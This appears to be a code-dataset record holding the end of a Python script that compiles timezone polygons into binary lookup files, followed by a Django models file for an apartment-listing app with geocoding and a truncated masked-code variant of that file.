min(y_coords)))\n poly_zone_ids.append(current_zone_id)\n\n # everything else is interpreted as a hole!\n for hole in poly_with_hole:\n print(polygon_counter, tz_name)\n # keep track of how many holes there are\n amount_of_holes += 1\n polynrs_of_holes.append(polygon_counter)\n x_coords, y_coords = list(zip(*hole))\n # IMPORTANT: do not use the last value (is equal to the first)!\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_holes.append((x_coords, y_coords))\n all_hole_lengths.append(len(x_coords))\n\n polygon_counter += 1\n\n current_zone_id += 1\n\n if max(all_lengths) >= 2 ** (8 * NR_BYTES_I):\n # 34621 in tz_world 2016d (small enough for int16)\n # 137592 in evansiroky/timezone-boundary-builder 2017a (now int32 is needed!)\n raise ValueError('amount of coords cannot be represented by int32 in poly_coord_amount.bin:',\n max(all_lengths))\n\n if max(all_hole_lengths) >= 2 ** (8 * NR_BYTES_H):\n # 21071 in evansiroky/timezone-boundary-builder 2017a (int16 still enough)\n raise ValueError('amount of coords cannot be represented by short (int16) in hole_coord_amount.bin:',\n max(all_hole_lengths))\n\n nr_of_lines = len(all_lengths)\n if polygon_counter != nr_of_lines:\n raise ValueError('polygon counter and entry number in all_length is different:', polygon_counter, nr_of_lines)\n\n if nr_of_lines >= 2 ** (8 * NR_BYTES_H):\n # 24k in tz_world 2016d\n # 1022 in evansiroky/timezone-boundary-builder 2017a\n raise ValueError('polygon id cannot be encoded as short (int16) in hole_coord_amount.bin! there are',\n nr_of_lines, 'polygons')\n\n if poly_zone_ids[-1] > 2 ** (8 * NR_BYTES_H):\n # 420 different zones in evansiroky/timezone-boundary-builder 2017a\n # used in shortcuts_unique_id and poly_zone_ids\n raise ValueError('zone id cannot be encoded as char (int8). the last id is',\n poly_zone_ids[-1])\n\n if 0 in all_lengths:\n raise ValueError()\n\n print('... parsing done.')\n print('maximal amount of coordinates in one polygon:', max(all_lengths))\n print('amount_of_holes:', amount_of_holes)\n print('amount of polygons:', nr_of_lines)\n print('\\n')\n\n\ndef update_zone_names(path=TIMEZONE_NAMES_FILE):\n global poly_zone_ids\n global list_of_pointers\n global all_boundaries\n global all_coords\n global all_lengths\n global polynrs_of_holes\n print('updating the zone names in {} now...'.format(path))\n # pickle the zone names (python array)\n with open(abspath(path), 'w') as f:\n f.write(json.dumps(all_tz_names))\n print('...Done.\\n\\nComputing where zones start and end...')\n i = 0\n last_id = -1\n for zone_id in poly_zone_ids:\n if zone_id != last_id:\n poly_nr2zone_id.append(i)\n if zone_id < last_id:\n raise ValueError()\n last_id = zone_id\n i += 1\n poly_nr2zone_id.append(i)\n print('...Done.\\n')\n\n\ndef compile_binaries():\n global nr_of_lines\n global shortcuts\n\n def print_shortcut_statistics():\n frequencies = []\n max_val = max(*nr_of_entries_in_shortcut)\n print('shortcut statistics:')\n print('highest entry amount is', max_val)\n while max_val >= 0:\n frequencies.append(nr_of_entries_in_shortcut.count(max_val))\n max_val -= 1\n\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max entries):')\n print(frequencies)\n empty_shortcuts = frequencies[0]\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print(percent(empty_shortcuts, amount_of_shortcuts), '% of all shortcuts are empty\\n')\n\n amount_of_different_zones = []\n for entry in shortcut_entries:\n registered_zone_ids = []\n for polygon_nr in entry:\n id = poly_zone_ids[polygon_nr]\n if id not in registered_zone_ids:\n registered_zone_ids.append(id)\n\n amount_of_different_zones.append(len(registered_zone_ids))\n\n frequencies = []\n max_val = max(*amount_of_different_zones)\n print('highest amount of different zones in one shortcut is', max_val)\n while max_val >= 1:\n frequencies.append(amount_of_different_zones.count(max_val))\n max_val -= 1\n # show the proper amount of shortcuts with 0 zones (=nr of empty shortcuts)\n frequencies.append(empty_shortcuts)\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max):')\n print(frequencies)\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print('--------------------------------\\n')\n\n def included_shortcut_row_nrs(max_lat, min_lat):\n return list(range(y_shortcut(max_lat), y_shortcut(min_lat) + 1))\n\n def included_shortcut_column_nrs(max_lng, min_lng):\n return list(range(x_shortcut(min_lng), x_shortcut(max_lng) + 1))\n\n def longitudes_to_check(max_lng, min_lng):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LNG\n current = ceil(min_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n end = floor(max_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n while current < end:\n output_list.append(current)\n current += step\n\n output_list.append(end)\n return output_list\n\n def latitudes_to_check(max_lat, min_lat):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LAT\n current = ceil(min_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n end = floor(max_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n while current < end:\n output_list.append(current)\n current += step\n\n output_list.append(end)\n return output_list\n\n def compute_x_intersection(y, x1, x2, y1, y2):\n \"\"\"returns the x intersection from a horizontal line in y with the line from x1,y1 to x1,y2\n \"\"\"\n delta_y = y2 - y1\n if delta_y == 0:\n return x1\n return ((y - y1) * (x2 - x1) / delta_y) + x1\n\n def compute_y_intersection(x, x1, x2, y1, y2):\n \"\"\"returns the y intersection from a vertical line in x with the line from x1,y1 to x1,y2\n \"\"\"\n delta_x = x2 - x1\n if delta_x == 0:\n return x1\n return ((x - x1) * (y2 - y1) / delta_x) + y1\n\n def x_intersections(y, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if y_coords[i] <= y:\n # print('Y1<=y')\n if y_coords[iplus1] > y:\n # this was a crossing. compute the intersect\n # print('Y2>y')\n intersects.append(\n compute_x_intersection(y, x_coords[i], x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n else:\n # print('Y1>y')\n if y_coords[iplus1] <= y:\n # this was a crossing. compute the intersect\n # print('Y2<=y')\n intersects.append(compute_x_intersection(y, x_coords[i], x_coords[iplus1], y_coords[i],\n y_coords[iplus1]))\n return intersects\n\n def y_intersections(x, x_coords, y_coords):\n\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if x_coords[i] <= x:\n if x_coords[iplus1] > x:\n # this was a crossing. compute the intersect\n intersects.append(\n compute_y_intersection(x, x_coords[i], x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n else:\n if x_coords[iplus1] <= x:\n # this was a crossing. compute the intersect\n intersects.append(compute_y_intersection(x, x_coords[i], x_coords[iplus1], y_coords[i],\n y_coords[iplus1]))\n return intersects\n\n def compute_exact_shortcuts(xmax, xmin, ymax, ymin, line):\n shortcuts_for_line = set()\n\n # x_longs = binary_reader.x_coords_of(line)\n x_longs, y_longs = ints_of(line)\n\n # y_longs = binary_reader.y_coords_of(line)\n y_longs.append(y_longs[0])\n x_longs.append(x_longs[0])\n\n step = 1 / NR_SHORTCUTS_PER_LAT\n # print('checking the latitudes')\n for lat in latitudes_to_check(ymax, ymin):\n # print(lat)\n # print(coordinate_to_longlong(lat))\n # print(y_longs)\n # print(x_intersections(coordinate_to_longlong(lat), x_longs, y_longs))\n # raise ValueError\n intersects = sorted([int2coord(x) for x in\n x_intersections(coord2int(lat), x_longs, y_longs)])\n # print(intersects)\n\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError('an uneven number of intersections has been accounted')\n\n for i in range(0, nr_of_intersects, 2):\n possible_longitudes = []\n # collect all the zones between two intersections [in,out,in,out,...]\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n # the polygon has a point exactly on the border of a shortcut zone here!\n # only select the top shortcut if it is actually inside the polygon (point a little up is inside)\n if contained(coord2int(intersection_in), coord2int(lat) + 1, x_longs,\n y_longs):\n shortcuts_for_line.add((x_shortcut(intersection_in), y_shortcut(lat) - 1))\n # the bottom shortcut is always selected\n shortcuts_for_line.add((x_shortcut(intersection_in), y_shortcut(lat)))\n\n else:\n # add all the shortcuts for the whole found area of intersection\n possible_y_shortcut = y_shortcut(lat)\n\n # both shortcuts should only be selected when the polygon doesnt stays on the border\n middle = intersection_in + (intersection_out - intersection_in) / 2\n if contained(coord2int(middle), coord2int(lat) + 1, x_longs,\n y_longs):\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n\n possible_longitudes.append(intersection_out)\n\n # the shortcut above and below of the intersection should be selected!\n possible_y_shortcut_min1 = possible_y_shortcut - 1\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut))\n shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut_min1))\n else:\n # polygon does not cross the border!\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n\n possible_longitudes.append(intersection_out)\n\n # only the shortcut above of the intersection should be selected!\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut))\n\n # print('now all the longitudes to check')\n # same procedure horizontally\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lng in longitudes_to_check(xmax, xmin):\n # print(lng)\n # print(coordinate_to_longlong(lng))\n # print(x_longs)\n # print(x_intersections(coordinate_to_longlong(lng), x_longs, y_longs))\n intersects = sorted([int2coord(y) for y in\n y_intersections(coord2int(lng), x_longs, y_longs)])\n # print(intersects)\n\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError('an uneven number of intersections has been accounted')\n\n possible_latitudes = []\n for i in range(0, nr_of_intersects, 2):\n # collect all the zones between two intersections [in,out,in,out,...]\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n # the polygon has a point exactly on the border of a shortcut here!\n # only select the left shortcut if it is actually inside the polygon (point a little left is inside)\n if contained(coord2int(lng) - 1, coord2int(intersection_in), x_longs,\n y_longs):\n shortcuts_for_line.add((x_shortcut(lng) - 1, y_shortcut(intersection_in)))\n # the right shortcut is always selected\n shortcuts_for_line.add((x_shortcut(lng), y_shortcut(intersection_in)))\n\n else:\n # add all the shortcuts for the whole found area of intersection\n possible_x_shortcut = x_shortcut(lng)\n\n # both shortcuts should only be selected when the polygon doesnt stays on the border\n middle = intersection_in + (intersection_out - intersection_in) / 2\n if contained(coord2int(lng) - 1, coord2int(middle), x_longs,\n y_longs):\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n\n possible_latitudes.append(intersection_out)\n\n # both shortcuts right and left of the intersection should be selected!\n possible_x_shortcut_min1 = possible_x_shortcut - 1\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut, y_shortcut(possible_latitude)))\n shortcuts_for_line.add((possible_x_shortcut_min1, y_shortcut(possible_latitude)))\n\n else:\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n # only the shortcut right of the intersection should be selected!\n possible_latitudes.append(intersection_out)\n\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut, y_shortcut(possible_latitude)))\n\n return shortcuts_for_line\n\n def construct_shortcuts():\n print('building shortucts...')\n print('currently at polygon nr:')\n line = 0\n for xmax, xmin, ymax, ymin in all_boundaries:\n # xmax, xmin, ymax, ymin = boundaries_of(line=line)\n if line % 100 == 0:\n print(line)\n # print([xmax, xmin, ymax, ymin])\n\n column_nrs = included_shortcut_column_nrs(xmax, xmin)\n row_nrs = included_shortcut_row_nrs(ymax, ymin)\n\n if big_zone(xmax, xmin, ymax, ymin):\n\n # print('line ' + str(line))\n # print('This is a big zone! computing exact shortcuts')\n # print('Nr of entries before')\n # print(len(column_nrs) * len(row_nrs))\n # print('columns and rows before optimisation:')\n # print(column_nrs)\n # print(row_nrs)\n # print(ints_of(line))\n\n # This is a big zone! compute exact shortcuts with the whole polygon points\n shortcuts_for_line = compute_exact_shortcuts(xmax, xmin, ymax, ymin, line)\n # n += len(shortcuts_for_line)\n\n min_x_shortcut = column_nrs[0]\n max_x_shortcut = column_nrs[-1]\n min_y_shortcut = row_nrs[0]\n max_y_shortcut = row_nrs[-1]\n shortcuts_to_remove = []\n\n # remove shortcuts from outside the possible/valid area\n for x, y in shortcuts_for_line:\n if x < min_x_shortcut or x > max_x_shortcut or y < min_y_shortcut or y > max_y_shortcut:\n shortcuts_to_remove.append((x, y))\n\n for s in shortcuts_to_remove:\n shortcuts_for_line.remove(s)\n\n # print('and after:')\n # print(len(shortcuts_for_line))\n # print(shortcuts_for_line)\n # column_nrs_after = set()\n # row_nrs_after = set()\n # for x, y in shortcuts_for_line:\n # column_nrs_after.add(x)\n # row_nrs_after.add(y)\n # print(column_nrs_after)\n # print(row_nrs_after)\n # print(shortcuts_for_line)\n\n if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):\n raise ValueError(\n 'there are more shortcuts than before now. there is something wrong with the algorithm!')\n if len(shortcuts_for_line) < 3:\n raise ValueError('algorithm not valid! less than 3 zones detected (should be at least 3)')\n\n else:\n shortcuts_for_line = []\n for column_nr in column_nrs:\n for row_nr in row_nrs:\n shortcuts_for_line.append((column_nr, row_nr))\n # print(shortcuts_for_line)\n\n for shortcut in shortcuts_for_line:\n shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]\n\n line += 1\n # print('collected entries:')\n # print(n)\n\n start_time = datetime.now()\n construct_shortcuts()\n end_time = datetime.now()\n print('calculating the shortcuts took:', end_time - start_time, '\\n')\n\n # there are two floats per coordinate (lng, lat)\n nr_of_floats = 2 * sum(all_lengths)\n\n # write number of entries in shortcut field (x,y)\n nr_of_entries_in_shortcut = []\n shortcut_entries = []\n amount_filled_shortcuts = 0\n\n def sort_poly_shortcut(poly_nrs):\n # TODO write test\n # the list of polygon ids in each shortcut is sorted after freq. of appearance of their zone id\n # this is critical for ruling out zones faster\n # (as soon as just polygons of one zone are left this zone can be returned)\n # only around 5% of all shortcuts include polygons from more than one zone\n # in most of those cases there are only two types of zones (= entries in counted_zones) and one of them\n # has only one entry (important to check the zone with one entry first!).\n polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]\n id_freq = [polygon_ids.count(id) for id in polygon_ids]\n zipped = list(zip(poly_nrs, polygon_ids, id_freq))\n # also make sure polygons with the same zone freq. are ordered after their zone id\n # (polygons from different zones should not get mixed up)\n sort = sorted((sorted(zipped, key=lambda x: x[1])), key=lambda x: x[2])\n return [x[0] for x in sort] # take only the polygon nrs\n\n # count how many shortcut addresses will be written:\n # flatten out the shortcuts in one list in the order they are going to be written inside the polygon file\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[(x, y)]\n shortcut_entries.append(sort_poly_shortcut(shortcuts_this_entry))\n amount_filled_shortcuts += 1\n nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))\n # print((x,y,this_lines_shortcuts))\n except KeyError:\n nr_of_entries_in_shortcut.append(0)\n\n amount_of_shortcuts = len(nr_of_entries_in_shortcut)\n print_shortcut_statistics()\n\n if amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG * NR_SHORTCUTS_PER_LAT:\n print(amount_of_shortcuts)\n raise ValueError('this number of shortcut zones is wrong')\n\n print('The number of filled shortcut zones are:', amount_filled_shortcuts, '(=',\n round((amount_filled_shortcuts / amount_of_shortcuts) * 100, 2), '% of all shortcuts)')\n\n # for every shortcut <H and <I is written (nr of entries and address)\n shortcut_space = 360 * NR_SHORTCUTS_PER_LNG * 180 * NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I)\n for nr in nr_of_entries_in_shortcut:\n # every line in every shortcut takes up 2bytes\n shortcut_space += NR_BYTES_H * nr\n\n print('The number of polygons is:', nr_of_lines)\n print('The number of floats in all the polygons is (2 per point):', nr_of_floats)\n\n path = 'poly_nr2zone_id.bin'\n print('writing file', path)\n output_file = open(path, 'wb')\n for zone_id in poly_nr2zone_id:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n\n print('Done\\n')\n # write zone_ids\n path = 'poly_zone_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for zone_id in poly_zone_ids:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n\n # write boundary_data\n path = 'poly_max_values.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for xmax, xmin, ymax, ymin in all_boundaries:\n output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin), coord2int(ymax), coord2int(ymin)))\n output_file.close()\n\n # write polygon_data, addresses and number of values\n path = 'poly_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n addresses = []\n i = 0\n for x_coords, y_coords in all_coords:\n addresses.append(output_file.tell())\n if all_lengths[i] != len(x_coords):\n raise ValueError('x_coords do not have the expected length!', all_lengths[i], len(x_coords))\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n i += 1\n output_file.close()\n\n path = 'poly_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for adr in addresses:\n output_file.write(pack(b'<I', adr))\n output_file.close()\n\n path = 'poly_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_lengths:\n output_file.write(pack(b'<I', length))\n output_file.close()\n\n # [SHORTCUT AREA]\n # write all nr of entries\n path = 'shortcuts_entry_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr > 300:\n raise ValueError(\"There are too many polygons in this shortcut:\", nr)\n output_file.write(pack(b'<H', nr))\n output_file.close()\n\n # write Address of first Polygon_nr in shortcut field (x,y)\n # Attention: 0 is written when no entries are in this shortcut\n adr = 0\n path = 'shortcuts_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr == 0:\n output_file.write(pack(b'<I', 0))\n else:\n output_file.write(pack(b'<I', adr))\n # each line_nr takes up 2 bytes of space\n adr += 2 * nr\n output_file.close()\n\n # write Line_Nrs for every shortcut\n path = 'shortcuts_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for entries in shortcut_entries:\n for entry in entries:\n if entry > nr_of_lines:\n raise ValueError(entry)\n output_file.write(pack(b'<H', entry))\n output_file.close()\n\n # write corresponding zone id for every shortcut (iff unique)\n path = 'shortcuts_unique_id.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n if poly_zone_ids[-1] >= INVALID_ZONE_ID:\n raise ValueError(\n 'There are too many zones for this data type (H). The shortcuts_unique_id file need a Invalid Id!')\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[(x, y)]\n unique_id = poly_zone_ids[shortcuts_this_entry[0]]\n for nr in shortcuts_this_entry:\n if poly_zone_ids[nr] != unique_id:\n # there is a polygon from a different zone (hence an invalid id should be written)\n unique_id = INVALID_ZONE_ID\n break\n output_file.write(pack(b'<H', unique_id))\n except KeyError:\n # also write an Invalid Id when there is no polygon at all\n output_file.write(pack(b'<H', INVALID_ZONE_ID))\n\n output_file.close()\n # [HOLE AREA, Y = number of holes (very few: around 22)]\n hole_space = 0\n\n # '<H' for every hole store the related line\n path = 'hole_poly_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n i = 0\n for line in polynrs_of_holes:\n if line > nr_of_lines:\n raise ValueError(line, nr_of_lines)\n output_file.write(pack(b'<H', line))\n i += 1\n hole_space += output_file.tell()\n output_file.close()\n\n if i > amount_of_holes:\n raise ValueError('There are more related lines than holes.')\n\n # '<H' Y times [H unsigned short: nr of values (coordinate PAIRS! x,y in int32 int32) in this hole]\n path = 'hole_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<H', length))\n hole_space += output_file.tell()\n output_file.close()\n\n # '<I' Y times [ I unsigned int: absolute address of the byte where the data of that hole starts]\n adr = 0\n path = 'hole_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<I', adr))\n # each pair of points takes up 8 bytes of space\n adr += 2 * NR_BYTES_I * length\n hole_space += output_file.tell()\n output_file.close()\n\n # Y times [ 2x i signed ints for every hole: x coords, y coords ]\n # write hole polygon_data\n path = 'hole_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for x_coords, y_coords in all_holes:\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n hole_space += output_file.tell()\n output_file.close()\n\n polygon_space = nr_of_floats * NR_BYTES_I\n total_space = polygon_space + hole_space + shortcut_space\n\n print('the polygon data makes up', percent(polygon_space, total_space), '% of the data')\n print('the shortcuts make up', percent(shortcut_space, total_space), '% of the data')\n print('holes make up', percent(hole_space, total_space), '% of the data')\n print('Success!')\n return\n\n\nif __name__ == '__main__':\n # parsing the data from the .json into RAM\n parse_polygons_from_json(path=INPUT_JSON_FILE_NAME)\n # update all the zone names and set the right ids to be written in the poly_zone_ids.bin\n # sort data according to zone_id\n update_zone_names(path=TIMEZONE_NAMES_FILE)\n\n # IMPORTANT: import the newly compiled timezone_names pickle!\n # the compilation process needs the new version of the timezone names\n with open(abspath(join(__file__, pardir, TIMEZONE_NAMES_FILE)), 'r') as f:\n timezone_names = json.loads(f.read())\n\n # compute shortcuts and write everything into the binaries\n compile_binaries()\n",
"step-ids": [
11,
13,
15,
17,
22
]
}
|
[
11,
13,
15,
17,
22
] |
import datetime
import operator
import geopy
from django.db import models
from django.db.models import Q
from django.db.models.query import QuerySet
from django.db.models import permalink
from django.contrib.auth.models import User
geocoder = geopy.geocoders.Google()
class City(models.Model):
name = models.CharField(max_length=30, unique=True)
class Meta:
ordering = ('name',)
verbose_name_plural = "cities"
def __unicode__(self):
return self.name
class Area(models.Model):
name = models.CharField(max_length=50)
city = models.ForeignKey(City)
class Meta:
unique_together = ('name', 'city')
ordering = ('name',)
def __unicode__(self):
return self.name
class ApartmentQuerySet(QuerySet):
def available(self):
return self.filter(
is_available=True,
tenant__is_active=True,
)
class ApartmentManager(models.Manager):
def get_query_set(self):
return ApartmentQuerySet(self.model).select_related(
'area', 'area__city')
def available(self):
return self.get_query_set().available()
def search(self, search):
if search:
search = search.strip()
if not search:
return self.none()
search_fields = (
'area__name__iexact',
'area__city__name__iexact',
'postcode__iexact',
'address__icontains',
)
criteria = [Q(**{field : search})
for field in search_fields]
return self.filter(reduce(operator.or_, criteria))
class Apartment(models.Model):
TYPE_APARTMENT = 1
TYPE_DETACHED = 2
TYPE_SEMIDETACHED = 3
TYPE_COTTAGE =4
TYPE_CHOICES = (
(TYPE_APARTMENT, "Apartment"),
(TYPE_DETACHED, "Detached house"),
(TYPE_SEMIDETACHED, "Semi-detached house"),
(TYPE_COTTAGE, "Cottage"),
)
SAUNA_NONE = 1
SAUNA_SHARED = 2
SAUNA_OWN = 3
SAUNA_CHOICES = (
(SAUNA_NONE, "No sauna"),
(SAUNA_SHARED, "Shared/communal sauna"),
(SAUNA_OWN, "Own sauna"),
)
ROOM_CHOICES = (
(1, "1 room"),
(2, "2 rooms"),
(3, "3 rooms"),
(4, "4 rooms"),
)
LANDLORD_TENANT = 1
LANDLORD_PRIVATE = 2
LANDLORD_AGENCY = 3
LANDLORD_CHOICES = (
(LANDLORD_TENANT, "Occupant"),
(LANDLORD_PRIVATE, "Private landlord"),
(LANDLORD_AGENCY, "Rental agency"),
)
area = models.ForeignKey(Area)
tenant = models.ForeignKey(User)
landlord = models.IntegerField(
choices=LANDLORD_CHOICES,
default=LANDLORD_PRIVATE,
)
agency = models.CharField(max_length=100, null=True, blank=True)
agency_website = models.URLField(null=True, blank=True)
address = models.CharField(max_length=100)
postcode = models.CharField(max_length=7)
latitude = models.FloatField(null=True, blank=True)
longitude = models.FloatField(null=True, blank=True)
added_on = models.DateTimeField(auto_now_add=True)
is_available = models.BooleanField(default=True)
available_from = models.DateField(null=True, blank=True)
available_to = models.DateField(null=True, blank=True)
is_shared = models.BooleanField('Shared accomodation', default=False)
type = models.IntegerField(
choices=TYPE_CHOICES,
default=TYPE_APARTMENT,
)
num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)
floor = models.IntegerField(null=True, blank=True)
lift = models.BooleanField(default=False)
num_floors = models.IntegerField(null=True, blank=True)
sauna = models.IntegerField(
choices=SAUNA_CHOICES,
default=SAUNA_NONE,
)
rent_pcm = models.DecimalField(
decimal_places=2,
max_digits=8,
)
deposit = models.DecimalField(
decimal_places=2,
max_digits=8,
null=True,
blank=True
)
smoking = models.BooleanField(default=False)
pets = models.BooleanField(default=False)
size = models.FloatField('Size (sqm)')
garden_size = models.FloatField(null=True, blank=True)
furnished = models.BooleanField(default=False)
cable = models.BooleanField(default=False)
broadband = models.BooleanField(default=False)
satellite = models.BooleanField(default=False)
balcony = models.BooleanField(default=False)
parking = models.BooleanField(default=False)
garage = models.BooleanField(default=False)
bike_storage = models.BooleanField(default=False)
extra_storage = models.BooleanField(default=False)
gym = models.BooleanField(default=False)
laundry = models.BooleanField(default=False)
description = models.TextField(null=True, blank=True)
kitchen_amenities = models.TextField(null=True, blank=True)
furniture = models.TextField(null=True, blank=True)
heating = models.TextField(null=True, blank=True)
other_amenities = models.TextField(null=True, blank=True)
objects = ApartmentManager()
def __unicode__(self):
return self.get_full_address()
@permalink
def get_absolute_url(self):
return ('apartments:detail', [str(self.id)])
def get_full_address(self):
return "{0}, {1} {2}".format(
self.address,
self.postcode,
self.area.city.name.upper()
)
def is_agency_landlord(self):
return self.landlord == self.LANDLORD_AGENCY
def get_location(self):
searchable = "{0}, {1} {2}, Finland".format(
self.address,
self.postcode,
self.area.city,
)
address, (lat, lng) = geocoder.geocode(
searchable,
exactly_one=True
)
return lat, lng
def save(self, *args, **kwargs):
self.latitude, self.longitude = self.get_location()
super(Apartment, self).save(*args, **kwargs)
|
normal
|
{
"blob_id": "89ba805e47a9727573e1e25371a70fb887ee170d",
"index": 9141,
"step-1": "<mask token>\n\n\nclass Area(models.Model):\n <mask token>\n <mask token>\n\n\n class Meta:\n unique_together = 'name', 'city'\n ordering = 'name',\n <mask token>\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n return self.filter(is_available=True, tenant__is_active=True)\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related('area',\n 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n if search:\n search = search.strip()\n if not search:\n return self.none()\n search_fields = ('area__name__iexact', 'area__city__name__iexact',\n 'postcode__iexact', 'address__icontains')\n criteria = [Q(**{field: search}) for field in search_fields]\n return self.filter(reduce(operator.or_, criteria))\n\n\nclass Apartment(models.Model):\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE = 4\n TYPE_CHOICES = (TYPE_APARTMENT, 'Apartment'), (TYPE_DETACHED,\n 'Detached house'), (TYPE_SEMIDETACHED, 'Semi-detached house'), (\n TYPE_COTTAGE, 'Cottage')\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n SAUNA_CHOICES = (SAUNA_NONE, 'No sauna'), (SAUNA_SHARED,\n 'Shared/communal sauna'), (SAUNA_OWN, 'Own sauna')\n ROOM_CHOICES = (1, '1 room'), (2, '2 rooms'), (3, '3 rooms'), (4, '4 rooms'\n )\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n LANDLORD_CHOICES = (LANDLORD_TENANT, 'Occupant'), (LANDLORD_PRIVATE,\n 'Private landlord'), (LANDLORD_AGENCY, 'Rental agency')\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n landlord = models.IntegerField(choices=LANDLORD_CHOICES, default=\n LANDLORD_PRIVATE)\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n is_shared = models.BooleanField('Shared accomodation', default=False)\n type = models.IntegerField(choices=TYPE_CHOICES, default=TYPE_APARTMENT)\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n sauna = models.IntegerField(choices=SAUNA_CHOICES, default=SAUNA_NONE)\n rent_pcm = models.DecimalField(decimal_places=2, max_digits=8)\n deposit = models.DecimalField(decimal_places=2, max_digits=8, null=True,\n blank=True)\n smoking = models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = 